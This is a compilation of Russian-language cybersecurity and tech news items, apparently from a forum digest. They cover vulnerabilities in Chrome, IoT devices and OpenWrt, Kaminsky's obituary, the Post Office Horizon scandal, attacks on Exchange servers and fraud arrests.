Проблема в том, что всё работает на SoC (system-on-a-chip — система на кристалле), которая содержит аппаратный генератор случайных чисел (TRNG). Последний используется для извлечения случайности из физических процессов или явлений.
Так вот, специалисты отметили недостаток проверок ошибок в коде, при котором случайно сгенерированные числа уже нельзя назвать рандомными. Хуже того — они предсказуемые.
Проблема ограничивается IoT-устройствами, поскольку у них нет надлежащих операционных систем, которые бы шли с соответствующим API для генерации случайных чисел (например, /dev/random в Unix-подобных системах или BCryptGenRandom в Windows). Тем не менее, по словам специалистов, проблему можно решить обновлением софта.
• Source: https://labs.bishopfox.com/tech-blog/youre-doing-iot-rng
Дэниел Камински умер в своём доме в Сан-Франциско в возрасте 42 лет от диабетического кетоацидоза, из-за которого его часто госпитализировали в последние годы. Об этом сообщила The New York Times со ссылкой на родственников мужчины.
Камински был известным исследователем по кибербезопасности. Он прославился после 2008 года, когда раскрыл критическую уязвимость в DNS — «адресной книге» интернета. Недоработка позволяла злоумышленникам манипулировать DNS-трафиком, например, перенаправив его с безобидного сайта на поддельный и вредоносный.
Исследователь не стал эксплуатировать уязвимость и предупредил о ней Департамент нацбезопасности США, а также представителей Microsoft, Cisco и других крупных компаний. В качестве решения он предложил скоординировать исправление, внедрить его в одно и то же время, а затем держать в секрете до публичного объявления на конференции Black Hat. Камински убедил Microsoft провести тайный съезд лучших экспертов по кибербезопасности со всего мира, а затем внедрить патч.
Исправление DNS стало самым крупным, но не единственным вкладом исследователя в защиту интернета. В 2005 году специалисты по кибербезопасности обнаружили, что Sony BMG скрытно устанавливала на ПК программы для борьбы с музыкальным пиратством. Камински выяснил, что программное обеспечение компании заразило более 568 тысяч компьютеров и рассказал об этом публично.
Исследователь с детства занимался «тестированием на проникновение» — проверял компьютерные системы на возможность взлома. Он начал в четыре года после того как отец подарил ему первый компьютер из Radio Shack, а в пять лет освоил навыки программирования. Сначала Камински взламывал военные сайты, из-за этого его семью даже отключили от интернета на три дня из семи в неделю.
В сети исследователь был известен своей эмпатией и проявлением сочувствия. Он не стеснялся помогать журналистам и начинающим хакерам: например, он зачастую оплачивал отели или билеты на конференцию для хакеров Black Hat тем, кто не мог себе этого позволить. Когда его подопечная рассталась с молодым человеком, он купил ей билет на самолёт, чтобы она могла с ним увидеться, потому что верил, что они должны быть вместе — в итоге пара поженилась.
Эмпатия Камински затрагивала и его личные проекты. Когда его друг столкнулся с дальтонизмом, исследователь создал DanKam — мобильное приложение, которое расшифровывает цвета, не поддающиеся расшифровке у дальтоников. После того, как бабушка Камински потеряла слух, он занялся развитием слуховых аппаратов, а когда его тётя-дерматолог рассказала, что не может лечить пациентов со СПИДом от кожных заболеваний, он разработал инструменты для телемедицины.
Камински зачастую предлагали работу в крупных компаниях в Силиконовой долине, но он всегда отказывался. В последние годы своей жизни он был главным исследователем в компании White Ops, которую он помог основать.
Electronic Frontier Foundation после смерти исследователя заявила, что он был «воплощением настоящего хакерского духа». А основатель DefCon и Black Hat Джефф Мосс предложил внести имя Камински в зал славы интернета.
• Source: <https://www.nytimes.com/2021/04/27/technology/daniel-kaminsky- dead.html>
Индийский исследователь Раджвардхан Агарвал (Rajvardhan Agarwal) обнародовал в Twitter код PoC-эксплоита для недавно обнаруженной уязвимости, затрагивающей Chromium-браузеры, включая Chrome, Edge, Opera, Brave и так далее.
__https://twitter.com/x/status/1381643526010597380
Исследователь утверждает, что этот эксплоит использовался для компрометации Chrome и Edge на недавно завершившемся конкурсе Pwn2Own экспертами из команды Dataflow Security, которые получили 100 000 долларов за демонстрацию бага. Согласно правилам соревнования, информация об этой ошибке пока не разглашается, но была передана инженерам Google, чтобы те исправили проблему как можно скорее.
Агарвал рассказал журналистам The Record, что он нашел патчи для этой уязвимости, изучая исходный код JavaScript-движка V8, и это помогло ему воссоздать эксплоит с Pwn2Own, который он в итоге выложил на GitHub.
Код Агарвала позволяет потенциальному злоумышленнику запустить вредоносный код в операционной системе пользователя, однако сначала эксплоит должен выйти из песочницы Chrome. То есть атакующим понадобится первая часть этой цепочки эксплоитов, так как 0-day в V8 – это уже вторая фаза атаки.
При этом Агарвал предупреждает, что даже в текущем виде эксплоит опасен для встроенных и headless-версий Chromium, в которых песочница обычно не используется.
Хотя разработчики Chromium уже исправили ошибку в V8, патчи еще не добрались до новейших версий Chromium-браузеров, которые по-прежнему уязвимы для атак. Ожидается, что Google выпустит Chrome 90 на завтра, однако неизвестно, будет ли эта версия включать нужные патчи.
Источник: xakep.ru/2021/04/13/poc-for-chromium/
В прошлом году разработчики Google сообщали, что в ближайшие пару лет компания намерена отказаться от использования сторонних трекинг-cookies. Еще тогда у многих возник вопрос, собирается ли компания изобретать какой-то другой способ отслеживания индивидуальных пользователей?
Как теперь пишут в блоге разработчики Google, будущем они не намерены использовать «какие-либо технологии для отслеживания отдельных людей».
«Мы продолжаем получать вопросы о том, присоединится ли Google к другим представителям рекламной индустрии, которые намерены заменить сторонние файлы cookie на альтернативные идентификаторы на уровне пользователя. Сегодня мы однозначно заявляем, что после прекращения использования сторонних файлов cookie мы не будем создавать альтернативные идентификаторы для отслеживания людей, просматривающих веб-страницы, и не будем использовать их в наших продуктах».
Click to expand...
План по отказу от файлов cookie до сих пор неясен до конца. В целом известно, что Google планирует встроить в Chrome систему отслеживания на основе машинного обучения, которая объединит людей в различные группы по интересам (такие как «любители классической музыки») вместо создания индивидуальных профилей. Затем, когда придет время показывать рекламу, Chrome сможет положиться список интересов пользователя и размещать только релевантную рекламу.
В сущности, раньше при помощи файлов cookie человек отправлял личную информацию и подробную историю браузера на различные рекламные серверы, которые затем создавали файл интересов в облаке. В будущем же Chrome будет хранить эту детальную информацию локально и создавать профиль локально, и лишь подборка интересов будет передаваться рекламодателям через открытый API для показа релевантных объявлений.
Хотя можно подумать, что Google идет на некие жертвы, но на самом деле, это не так. Дело в том, что фактически Google не нужно отслеживать отдельных людей в рекламных целях. В будущем файлы cookie в Chrome заменит «Песочница конфиденциальности» (Privacy Sandbox), которая использует групповое отслеживание и даже лучше подходит рекламодателям.
«Рекламодателям не нужно отслеживать отдельных потребителей в интернете, чтобы пользоваться преимуществами цифровой рекламы. Современные достижения в области агрегации, анонимности, обработки [информации] на устройстве и другие технологии, сохраняющие конфиденциальность, предлагают прямой путь к замене индивидуальных идентификаторов», — говорят в Google.
Click to expand...
Речь о том, что, к примеру, рекламодателя с телефонной рекламой заботят лишь те люди, которым интересны телефоны. В этом свете рекламодателю не важны отдельные лица или точная история их просмотров, главное знать, что пользователи открыты для такого типа рекламы.
Источник: xakep.ru/2021/03/04/ad-tracking/
В новейшей версии Google Chrome (88.0.4324.150 ) для Windows, Mac и Linux, вышедшей 4 февраля 2021 года, была устранена 0-day уязвимость в JavaScript движке V8, которую уже используют хакеры. К сожалению, никаких деталей этих атак компания не раскрывает.
Уязвимость в конце января 2021 года обнаружил ИБ-эксперт Маттиас Буэленс (Mattias Buelens). Проблема получила идентификатор CVE-2021-21148 и описывается разработчиками как ошибка нарушение целостности информации в памяти, связанное с переполнением буфера хипа. И хотя обычно такие ошибки приводят к лишь к сбоям, в данном случае злоумышленники могут злоупотреблять багом для выполнения произвольного кода.
Интересно, что через несколько дней после получения отчета Буэленса аналитики Google Threat Analysis Group (TAG) предупредили о том, что северокорейские хакеры нацелились на ИБ-специалистов, занимающихся исследованиями уязвимостей. Тогда сообщалось, что злоумышленники могли использовать для атак комбинацию уязвимостей нулевого дня в Chrome и Windows 10.
Хотя пока Google официально не подтвердила этого, теперь многие специалисты полагают, что именно эту 0-day уязвимость в Chrome и эксплуатировали хакеры, и именно эти атаки в итоге были замечены экспертами компании.
Источник: xakep.ru/2021/02/05/chrome-patched-0day/
В развиваемом проектом OpenWrt инструментарии ASU (Attended SysUpgrade) [выявлены](https://lists.openwrt.org/pipermail/openwrt- announce/2024-December/000061.html) критические уязвимости (CVE-2024-54143), позволяющие скомпрометировать сборочные артефакты, распространяемые через сервис sysupgrade.openwrt.org или сторонние ASU-серверы, и добиться установки модифицированных злоумышленником образов прошивок на системы пользователей, применяющих для обновления прошивок режим "attended upgrade" через web- интерфейс selector.openwrt.org или инструментарий командной строки attended.sysupgrade.
Для успешного проведения атаки злоумышленнику достаточно отправить запрос формирования сборки на сервер ASU (подобные запросы любой пользователь может отправить без прохождения аутентификации). Через манипуляции со специально оформленным списком пакетов атакующий может организовать отправку ранее сгенерированных вредоносных образов в ответ на легитимные сборочные запросы других пользователей.
Сервис ASU применяется в OpenWrt для формирования и установки обновлений прошивок без потери имеющихся настроек и установленных пользователем пакетов. Через web-интерфейс или инструментарий командной строки пользователь отправляет запрос на формирование обновлённого образа прошивки, указывая установленные в его системе пакеты. Через какое-то время сервер ASU формирует образ, соответствующий заказанному содержимому, после чего пользователь загружает его и прошивает его на своё устройство. Дополнительно предоставляется опция, позволяющая сохранить в обновлённой прошивке имеющиеся настройки.
За обработку запросов от пользователей отвечает ASU Server, который запускает автоматическую сборку образов прошивок при помощи инструментария ImageBuilder, а также поддерживает кэш из ранее подготовленных сборок. В случае, если пользователь запросил образ, который уже ранее собирался на сервере и сохраняет актуальность, система сразу отдаёт имеющийся образ из кэша без запуска сборочного процесса.
Поведение атаки стало возможным благодаря двум уязвимостям:
Изменение, после которых появилась возможность совершения атаки, было внесено 8 июля. Проблема устранена 4 декабря. Для обеспечения работы сервиса ASU использовались отдельные серверы, не пересекающиеся с основными сборочными системами проекта, отделённые от OpenWrt Buildbot и не имеющие доступа к таким конфиденциальным ресурсам, как SSH-ключи и сертификаты для формирования цифровых подписей.
[Утверждается](https://lists.openwrt.org/pipermail/openwrt- announce/2024-December/000061.html), что разработчики OpenWrt не нашли следов компрометации инфраструктуры проекта, но для подстраховки с нуля переустановили системы, на которых выполнялись уязвимые компоненты. Проблема не затронула официальные образы, распространяемые через сайт downloads.openwrt.org, а при анализе сборочных логов не было найдено следов отправки вредоносных запросов. При этом, так как на серверах ASU выполняется автоматическая чистка сборок старше 7 дней, провести аудит старых сборок оказалось невозможно.
Вероятность использования выявленных уязвимостей на практике для
распространения вредоносных образов через инфраструктуру OpenWrt оценивается
представителями OpenWrt как близкая к нулю, тем не менее пользователям ASU
рекомендуется на своих устройствах [заменить](https://openwrt.org/docs/guide-
user/installation/generic.sysupgrade) прошивки OpenWrt на ту же версию.
источник
Киберпреступники парализовали работу нефтебаз Oiltanking и Mabanaft по всей
Германии.
Oiltanking GmbH Group была атакована еще в субботу. В компании прилагают все
усилия, чтобы решить проблему и установить масштабы атаки. Oiltanking GmbH
Group сотрудничает с приглашенными специалистами и компетентными органами
власти для устранения неполадок и выяснения обстоятельств случившегося. Глава
Федерального ведомства по безопасности информационной техники ФРГ (BSI) Арне
Шёнбом подтвердил факт совершения кибератаки.
В настоящее время все погрузочно-разгрузочные системы Oiltanking парализованы.
По его словам, в результате пострадали 233 заправочные станции (в основном, на
севере Германии), что составляет всего 1,7% от общего числа АЗС по стране. Он
отметил, что на некоторых из этих станций нельзя было расплатиться кредитной
картой или изменить цены на топливо, но в некоторых случаях можно было
заплатить наличными.
Oiltanking — поставщик логистических услуг резервуарных терминалов для
нефтепродуктов, химикатов и газов. Компания принадлежит гамбургской группе
компаний Marquard & Bahls. В настоящее время Oiltanking не может в рабочем
режиме осуществлять свою деятельность из-за кибератаки.
В немецком подразделении Mabanaft Group, которая является импортером, оптовым
продавцом и поставщиком мазута, бензина и дизельного топлива, также заявили о
форс-мажоре, который негативно сказывается на деятельности в Германии.
Mabanaft принадлежит гамбургской группе компаний Marquard & Bahls Group, объем
продаж которой в 2020 году составил около €9,2 млрд.
Напомним на прошлой неделе Федеральное ведомство по охране конституции
Германии (Bundesamt für Verfassungsschutz, BfV) предупредило о текущих атаках,
координируемых китайской хакерской группировкой APT27 (также известной как
TG-3390, Emissary Panda, BRONZE UNION, Iron Tiger и LuckyMouse).
В территориальных органах МВД по Республике Крым участились случаи обращения граждан, имеющих схожий характер, связанные с дистанционными мошенничествами с использованием известного сайта бесплатных объявлений.
Сотрудниками Управления уголовного розыска МВД по Республике Крым при участии оперативников ОМВД России по Белогорскому району и ОМВД России по г. Феодосии проведен ряд оперативно-розыскных мероприятий по установлению личности причастного к обману крымчан. Им оказался 20-летний житель Челябинской области. Молодой человек обманным путем, с использованием подложной ссылки об оплате «безопасная сделка», предлагаемой интернет-сайтом, многократно похищал денежные средства с банковских карт жителей Республики Крым.
По поручению Министра внутренних дел Республики Крым был организован выезд в рабочую командировку сотрудников в Челябинскую область для его задержания.
Как выяснили оперативники, злоумышленник находил объявления о продаже различных товаров на сайте, списывался с продавцом и просил через один из мессенджеров предоставить ему данные карт для перечисления оплаты за покупку. Однако денег авторы объявлений не получали, вместо этого с их счетов списывались все денежные средства. После проведения преступных махинаций подозреваемый переставал выходить на связь и скрывался. Полицейские собрали доказательственную базу об использовании преступной схемы, которая связана с направлением каждому из потерпевших через мессенджеры гипер-ссылки на фиктивный интернет-ресурс, подконтрольный злоумышленнику, внешне похожий на опцию «Безопасная сделка» официального сайта объявлений. Суммы ущерба, нанесенного разным потерпевшим, варьируются от 6 до 40 тысяч рублей.
На сегодня полицейскими доказана причастность задержанного к более чем к 32 эпизодам мошенничеств на территории Республики Крым и 5 совершены в иных регионах России. Общая сумма ущерба лишь по первым установленным фактам преступной деятельности превысила 300 тыс. рублей. Сотрудниками полиции проводится комплекс мероприятий, направленных на установление полного круга потерпевших.
Оперативниками по месту регистрации молодого человека в Челябинской области проведён обыск, в ходе которого изъяты вещественные доказательства, подтверждающие его противоправную деятельность.
Следователями ряда территориальных органов МВД по Республике Крым возбуждены уголовные дела по признакам преступлений, предусмотренных ч.2 ст.159 УК РФ (мошенничество) и ч.3 ст.158 УК РФ (кража с банковского счета, а равно в отношении электронных денежных средств). Санкции данных статей предусматривают максимальное наказание в виде лишения свободы на срок до шести лет.
Подозреваемому избрана мера пресечения в виде домашнего ареста.
• Video: https://vk.com/video-76675302_456240124?list=4d6f8474a3cf91c835
Сотрудники британской почтовой компании Post Office Ltd. на протяжении последних 20 лет рисковали оказаться за решеткой или как минимум без жилья и средств к существованию из-за ошибок в программном обеспечении. Как пишет портал The Verge, компания использовала специализированный софт Horizon, принадлежащий японской Fujitsu. За ее разработкой стоит британская ICL – она создала Horizon в 1995 г. В 1998 г. Fujitsu стала единственным акционером ICL, а в 2002 г. она перестала существовать под своим именем и была переименована в Fujitsu.
В Horizon присутствовала фатальная ошибка, из-за которой ПО вело неправильные подсчеты и раз за разом показывало недостачи денег, которые руководители почтовых отделений Post Office затем приписывали сотрудникам отделений. В компании были уверены в том, что Horizon работает безупречно.
BBC пишет, что случай с Post Office стал крупнейшей судебной ошибкой за всю историю Великобритании, поскольку из-за бага в Horizon пострадали без преувеличения сотни невиновных людей. Сама компания существует с 1986 г., и на начало 2019 г. ее штат насчитывал свыше 5000 сотрудников.
Сломанные судьбы
BBC пишет, что из-за программистов ICL и руководства Post Office жизнь многих сотрудников почтовых отделений была разрушена. От кого-то ушел супруг, а кто- то, как, например, Джанет Скиннер (Janet Skinner), лишился возможности растить своих детей.
Скиннер не просто разлучили с детьми – ее посадили в тюрьму на девять месяцев после того, как злополучное детище Fujitsu выявило в отделении, в котором она работала, недостачу в размере 59 тыс. фунтов стерлингов (6,148 млн руб. по курсу ЦБ на 26 апреля 2021 г.).
Но случай Джанет Скиннер далеко не самый вопиющий. Уверенность британских руководителей в том, что японское ПО безупречно, привело к тому, что свободы лишилась ни в чем не повинная беременная женщина. И даже это, как выяснилось, не предел – в одном из офисов компании Post Office программа Horizon выявила недостачу почти в 100 тыс. фунтов стерлингов (10,42 млн руб.). Ее «повесили» на сотрудника отделения, и тот, узнав об этом, покончил жизнь самоубийством. Это не надоумило руководство Post Office проверить, все ли в порядке с ПО Fujitsu. В итоге всего несколько месяцев спустя новый сотрудник, заменивший покончившего собой, тоже пострадал из-за ошибок в работе Horizon.
Британская судебная система была беспощадная не только к беременным женщинам, но и к пожилым мужчинам. Так, 62-летний Виджай Парех (Vijay Parekh), пишет The Guardian, провел в тюрьме полгода. Его обвинили в краже 72 тыс. фунтов стерлингов (7,5 млн руб.), и адвокат посоветовал ему признать вину.
Тюрьма или потеря жилья
По информации BBC, ошибочные подсчеты, производимые Horizon, привели, в общей сложности, к судебному преследованию почти 740 сотрудников Post Office за период с 2000 по 2014 гг. Число людей, получивших повестки в течение последних семи лет, еще подлежит уточнению.
Вариантов у работников Post Office, оказавшихся «под прицелом» ПО Horizon, было не так уж много. Кто-то отправлялся в тюрьму, а кто-то мог остаться без единого фунта сбережений в попытке покрыть недостачу, которой на самом деле не было, из своего кармана.
Были среди пострадавших и те, кто буквально рисковал переехать жить на улицу. Не имея на руках свободных средств, они закладывали свои дома, лишь бы подсчеты в программном обеспечении сошлись, и им не пришлось отправляться в тюрьму.
Post Office признала ошибку
На момент публикации материала компания Post Office призналась в том, что слишком непоколебимо верила в надежность ПО Horizon. Пока неизвестно, когда именно она признала свою ошибку, но сейчас она стремится исправить хотя бы те последствия этого, которые еще можно.
23 апреля 2021 г. Королевский суд Лондона вынес 39 оправдательных приговоров в отношении сотрудников Post Office. Ранее все они были по ошибке осуждены за кражу денег у компании – кто-то поплатился увольнением, а кто-то – свободой.
Как пишет издание Daily Mail-Online, судья, оправдавший невиновных, заявил, что руководство Post Office знало о существовании проблемы в работе Horizon. О том же пишет и BBC: издание утверждает, что Post Office была осведомлена о проблеме с программным обеспечением еще до вынесения обвинительных приговоров. BBC утверждает, что есть свидетельства, что такой информацией владел юридический отдел компании. Неназванный сотрудник компании сообщил изданию, что компания «без труда приняла потерю жизни свободы и рассудка простых граждан в погоне за репутацией и прибылью» (readily accepted the loss of life, liberty and sanity for many ordinary people in its pursuit of reputation and profit). Представители Post Office и Fujitsu на момент публикации материала никак не комментировали это.
В декабре 2020 г. тот же Королевский суд Лондона оправдал еще шестерых работников Post Office. Компания выплатила всем им финансовую компенсацию, размер которой остается неизвестным.
Попытки загладить вину
Post Office пытается загладить свою вину перед сотрудниками на протяжении нескольких лет. Известно, что еще в 2019 г. компания выплатила компенсацию 555 пострадавшим, и тогда же она организовала целую систему выплат сотрудникам, которых так или иначе зацепила проблема с Horizon. Как она собирается компенсировать смерть как минимум одного из сотрудников, пока неясно.
По данным BBC, всего на получение материальной компенсации от Post Office подано более 2400 заявлений. Не исключено, что со временем их может стать больше.
Некоторые из тех, кто получил компенсацию, остались довольны ею и тем, что их имя было обелено. Другие же, напротив, хотят добиться публичного расследования и привлечения всех виновных к ответственности.
Horizon все еще работает
Если выплачивать компенсации Post Office начала в 2019 г., то от использования Horizon она не отказалась до сих пор. Ломающее жизни программное обеспечение все еще работает в сети компании, но в обозримом будущем его заменят на новое облачное решение.
Об этом 13 апреля заявил лично Ник Рид (Nick Read), генеральный директор Post Office, занимающий этот пост с июля 2019 г. В то же время сроки перехода на облако он не конкретизировал.
Название и разработчик облачного ПО, которое придет на замену Horizon, остаются неизвестными.
Ник Рид добавил, что Post Office заручится поддержкой британского правительства с целью компенсировать ущерб своим сотрудникам. Премьер-министр Великобритании Борис Джонсон (Boris Johnson) опубликовал в Twitter пост, в котором назвал первоначальные судебные приговоры «ужасающей несправедливостью» (an appalling injustice).
Известный ИБ-эксперт, журналист и автор блога KrebsOnSecurity Брайан Кребс не раз становится мишенью для атак и издевок хакеров. Дело в том, что Кребс знаменит своими расследованиями и разоблачениями, и за долгие годы своей карьеры он помог найти и деанонимизировать не один десяток преступников, что последним, конечно, совсем не нравится.
Преступники мстят журналисту на протяжении многих лет. Так, домой к Кребсу уже присылали отряд спецназа, брали от его имени кредит на 20 000 долларов, перечисляли 1000 долларов на его счет PayPal с украденной платежной карты, а сам PayPal-аккаунт компрометировали не раз, и даже пытались перевести деньги со счета Кребса террористу запрещенной в России организации ИГИЛ. После разоблачения авторов IoT-малвари Mirai сайт Кребса и вовсе подвергся одной из самых мощных на тот момент DDoS-атак в истории.
Пару лет назад против журналиста и ополчились пользователи немецкого имиджборда Pr0gramm (pr0gramm.com), с которым были связаны операторы криптоджекингового сервиса Coinhive. Обиженные расследованием Кребса пользователи запустили в соцсетях кампанию #KrebsIsCancer («Кребс — это рак»). Дело в том, что на немецкий язык фамилия журналиста, Krebs, переводится как «рак», и на Pr0gramm решили в буквальном смысле «бороться с раком»: потроллили Кребса и в итоге пожертвовали более 120 000 долларов на борьбу с онкозаболеваниями.
Также стоит заметить, что авторы малвари нередко упоминают Брайана Кребса в коде своих программ в качестве своеобразного «привета». По словам журналиста, полный список таких случаев состоял бы из сотен страниц.
Вчера на KrebsOnSecurity появилась публикация, озаглавленная «Нет, я не взламывал ваш сервер MS Exchange». В ней Кребс рассказывает, что теперь «от его имени» происходят атаки на серверы, уязвимые перед проблемами ProxyLogon.
Исследователь пишет, что специалисты Shadowserver Foundation обнаружили, что серверы Microsoft Exchange подвергаются атакам вредоносов KrebsOnSecurity и Yours Truly.
Так, сначала атакующие размещают на уязвимом сервере веб-шелл Babydraco по адресу /owa/auth/babydraco.aspx. Затем посредством PowerShell загружается вредоносный файл krebsonsecurity.exe, обеспечивающий передачу данных между сервером-жертвой и доменом злоумышленников — Krebsonsecurity[.]top.
Эксперты Shadowserver нашли более 21 000 серверов Exchange с установленным бэкдором Babydraco, хотя им неизвестно, сколько из этих систем выполняли загрузку вторичных пейлоадов с мошеннической версии Krebsonsecurity.
«Мотивы киберпреступников, стоящих за доменом Krebonsecurity[.]top, неясны, но сам домен недавно был связан с другими видами киберпреступной активности и с атаками на меня. Впервые я услышал об этом домене в декабре 2020 года, когда один из читателей рассказал мне, что вся его сеть была захвачена ботнетом для майнинга криптовалюты, который связывался с этим доменом», — рассказывает Кребс.
Click to expand...
Далее исследователь цитирует декабрьское сообщение читателя:
«Сегодня утром я заметил, что кулер на сервере в моей домашней лаборатории сильно шумит. Сначала я не придал этому значения, но после тщательной чистки и тестирования он все равно шумел. Закончив с другими делами, связанными с работой, я проверил и обнаружил, что в мою систему проник криптомайнер, указывающий на XXX-XX-XXX.krebsonsecurity.top. В итоге он заразил все три Linux-сервера в моей сети».
Click to expand...
Кребс объясняет, что вместо «XXX-XX-XXX» в этом адресе значился его номер социального страхования. «Меня задоксили через DNS», — резюмирует он.
Источник: xakep.ru/2021/03/29/exchange-krebs/
В рамках мартовского «вторника обновлений» инженеры Microsoft исправили 82 уязвимости в продуктах компании. 10 из них классифицированы как критические, а 72 — как важные. Важно заметить, что сюда не включены 7 уязвимостей в Microsoft Exchange и еще 33 уязвимости в Chromium Edge, выпущенные ранее в этом месяце. Также среди устраненных багов были две уязвимости нулевого дня, одна из которых находилась под атаками.
Напомню, что ранее в этом месяце Microsoft представила внеплановые патчи для уязвимостей в коде почтового сервера Exchange. В компании предупреждали, что эти проблемы уже эксплуатируют китайские хакеры из группировки Hafnium, и вскоре к атакам подключились и другие хак- группы.
Учитывая серьезность ситуации, помимо [обычных патчей](https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting- exchange-servers/) инженеры Microsoft подготовили [исправления](https://techcommunity.microsoft.com/t5/exchange-team- blog/march-2021-exchange-server-security-updates-for-older- cumulative/ba-p/2192020) для старых и неподдерживаемых версий Exchange, а также выпустили специальный PowerShell- скрипт, предназначенный для проверки серверов Exchange на предмет взлома и известных индикаторов компрометации (веб-шеллов).
Вместе с исправлениями для багов нулевого дня эксперты подготовили и исправления для трех уязвимостей в Microsoft Exchange, которые не использовались хакерами:
Теперь, уже в числе регулярных патчей, вышли исправления для двух других уязвимостей нулевого дня, одна из которых находилась под атаками. Так, в январе 2021 года специалисты Google сообщали, что хак- группа Lazarus атаковала ИБ-исследователей с использованием скомпрометированных проектов Visual Studio и ранее неизвестных эксплоитов для проблем нулевого дня.
В феврале компания Enki предупредила, что злоумышленники использовали в этих атаках 0-day в Internet Explorer для установки собственных бэкдоров. В итоге эта проблема получила идентификатор [CVE-2021-26411](https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2021-26411). Как оказалась, баг был связан с повреждением информации в памяти, и теперь для него наконец вышел патч.
Еще одна уязвимость нулевого дня, исправленная на этой неделе, имеет идентификатор [CVE-2021-27077 ](https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2021-27077)и связана с повышением привилегий в Windows Win32k. Ее еще в январе [обнаружили и описали](http://www.zerodayinitiative.com/blog/2021/1/27/zdi- can-12671-windows-kernel-dosprivilege-escalation-via-a-null-pointer-deref) эксперты Trend Micro Zero Day Initiative, и изначально Microsoft не планировала ее исправлять.
Другие компании тоже выпустили обновления для своих продуктов на этой неделе. Среди них:
Источник: xakep.ru/2021/03/11/march-patches-2/
Тестировщикам ПО в России стали платить почти столько же, сколько PHP- программистам на начальном уровне. При этом им не нужно уметь писать программы, да и в целом требований к ним сильно меньше, чем к кодерам. За два года зарплаты тестировщиков существенно выросли, притом не только в Москве, но и в городах-миллионниках, плетущихся в конце большинства рейтингов. Но курьеры все равно получают немного больше, а PHP-программисты страдают от инфляции - национальная валюта обесценивается быстрее, нежели растут их доходы.
Ломать программы за деньги
В России за последние за последние два года ощутимо выросли зарплаты тестировщиков ПО – специалистов, выискивающих недочеты в программах и заставляющих программистов их устранять. При этом за тот же период времени количество требований к ним почти не увеличилось – их стало лишь совсем немного больше, и то лишь к самым опытным работникам, которые требуют за соответствие им высокую гораздо больше денег, нежели новички, как сообщили CNews представители сервиса по поиску работы SuperJob.
В некоторых российских городах начинающие тестировщики ПО, также известные, как QA-специалисты (Quality Assurance – обеспечение качества), на начальном уровне получают не меньше, чем программисты на PHP, но при этом от них никто не требует знаний языка программирования – достаточно будет лишь понимания общих принципов написания программного кода. Например, в мае 2024 г. начинающий PHP-программист из Волгограда получал от 70 тыс. руб., а тестировщик в этом же городе может рассчитывать на 60 тыс. руб. В 2022 г., как сообщал CNews, его зарплата составляла от 35 тыс. руб. Доходы PHP- программистов тоже растут, но не опережают инфляцию, то есть, по сути, эти специалисты беднеют.
Что входит в должностные обязанности
Задач, стоящих перед тестировщиком, сравнительно немного. В зависимости от опыта работы и ряда других факторов он будет заниматься разработкой тест- стратегий, тест-планов и тест-сценариев, проводить различные типы тестирования ПО, а также составлять отчеты о проделанной работе.
Наряду с этим QA-специалисты ведут мониторинг обнаруженных дефектов и при необходимости регистрируют их. Также по долгу службы им приходится взаимодействовать с разработчиками ПО и аналитиками.
Где платят больше
В большинстве городов-миллионников (в России их всего 16) зарплата начинающего тестировщика ПО стартует с 50 тыс. руб. в месяц. Санкт-Петербург и Екатеринбург предлагают от 60 тыс. руб., Москва – от 70 тыс. руб. Но стоит понимать, что тестирование программ в большинстве случаев вовсе не подразумевает ежедневную работу в офисе, то есть вполне можно работать на столичную компанию, проживая за тысячи километров от ее офиса.
Заработная плата тестировщиков
Самые опытные QA-инженеры, не один год жизни посвятившие этой профессии, уже могут рассчитывать на шестизначную сумму в графе «Зарплата». Меньше всего такие специалисты получают в Уфе – 150-240 тыс. руб. в месяц, а в Волгограде вилка составляет от 160 до 250 тыс. руб. В Новосибирске можно получать до 270 тыс. руб., в Санкт-Петербурге – до 290 тыс. руб.
Лидером, в подавляющем большинстве других сфер деятельности в России, является Москва. Работающий на столичную фирму опытный тестировщик зарабатывает ежемесячно от 220 до 350 тыс. руб., и это в некоторых случаях даже больше зарплаты PHP-программиста с многолетним стажем.
Диплом можно оставить дома
По данным SuperJob, в списке требований к тестировщикам не упоминается наличие высшего образования. Это одинаково применимо как джунам, то есть к начинающим, так и к сеньорам, то есть тем, кто в профессии много лет.
Более того, у профессии сравнительно низкий порог входа – даже знание английского языка на начальном уровне не требуется, не говоря уже об умении писать программы, да и в самом программировании нужно разбираться лишь на базовом уровне.
Требования работодателей к тестировщикам
Требований становится больше по мере роста зарплаты. Эксперты SuperJob поделили всех QA-инженеров на четыре категории, и уже во второй, далеко не самой топовой, требуется знание английского языка на уровне технической литературы. Вторая категория присваивается при наличии опыта работы от одного года.
Но всего этого можно избежать, если уйти из профессии и в целом из ИТ и начать разносить товары и еду. В начале сентября 2024 г. CNews писал, что зарплаты курьеров пошли в рост на фоне повышенного интереса россиян к онлайн-покупкам с доставкой. Теперь они зарабатывают больше многих ИТ-специалистов – более 100 тыс. руб. в месяц, а требуется от них только умение ходить или ездить на велосипеде и ориентироваться в пространстве. И высшее образование для работы в этой сфере тоже не требуется.
Пока еще мужская профессия
По информации SuperJob, средний возраст специалиста по тестированию ПО в настоящее время составляет 34 года. В большинстве своем эта сфера состоит из мужчин – их 68% против 32% женщин. 70% имеют высшее образование, но всего лишь 36% готовы к переезду. У 60%тестировщиков на момент размещения резюме не было работы, а средний срок их работы на предыдущем месте составляет 2,5 года.
За два года все изменилось довольно сильно – например, в профессию пришло больше людей без высшего образования. В 2022 г. высшее образование было 75% специалистов, а средний возраст составлял 30 лет. 63% кандидатов на момент размещения резюме не имели работы, а к переезду были готовы 34% соискателей.
В полицию Иркутска поступил ряд сообщений от граждан о хищении их денежных средств при оплате товаров в одном и том же интернет-магазине, созданном неизвестными в мессенджере.
Сотрудники ОП № 6 Межмуниципального управления МВД России «Иркутское» в результате оперативно-розыскных мероприятий установили личности двух организаторов онлайн-маркета и, выехав в служебную командировку в Псков, задержали их. Ими оказались двое 21-летних местных жителей.
Подозреваемые в мошенничестве раскаялись в содеянном и пояснили, что размещали на своей фейковой торговой площадке объявления о продаже различных вещей и предметов, описание которых вместе с изображением брали со страниц известных маркетплейсов. При этом товаров, предлагаемых к приобретению по цене в 10 раз ниже рыночной, в наличии у них не было.
Аферисты обещали клиентам отправить заказ при осуществлении полной оплаты, однако при получении денег умышленно не выполняли взятые на себя обязательства и переставали выходить на связь.
По предварительным данным полиции, жертвами подельников стали множество жителей разных регионов России, из которых более 30 человек – из Иркутска. Сумма ущерба, причинённого всем потерпевшим, может превышать 10 млн рублей.
